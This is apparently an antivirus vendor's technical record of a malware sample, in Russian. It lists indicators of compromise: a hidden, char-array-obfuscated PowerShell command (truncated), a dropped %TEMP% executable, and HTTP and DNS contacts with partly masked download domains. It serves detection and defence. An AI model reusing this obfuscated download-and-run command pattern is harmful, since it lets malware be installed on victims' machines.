Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$(SV 'oFs' '')"+[StrinG]([CHAR[]](16 ,125 , 88, 102, 88, 93 ,68 , 20 , 9 , 20, 90, 81 ,67, 25 , 91, 86, 94, 81,87,64, 20 , 70,85,90 ,80,91 ,89,15 ,16,80 , 94,126, 113, 125, 20 , 9 , 20 ,90, 8...
- %TEMP%\678142.exe
- %TEMP%\678142.exe
- 'pl####ferguson.net':80
- 'k8##.com':80
- http://pl####ferguson.net/DEAXUW/
- http://k8##.com/FrFR/
- DNS ASK pl####ferguson.net
- DNS ASK dl##map.com
- DNS ASK ho###mail.ru
- DNS ASK k8##.com
- DNS ASK co###gica.co.in
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$(SV 'oFs' '')"+[StrinG]([CHAR[]](16 ,125 , 88, 102, 88, 93 ,68 , 20 , 9 , 20, 90, 81 ,67, 25 , 91, 86, 94, 81,87,64, 20 , 70,85,90 ,80,91 ,89,15 ,16,80 , 94,126, 113, 125, 20 , 9 , 20 ,90, 8...' (со скрытым окном)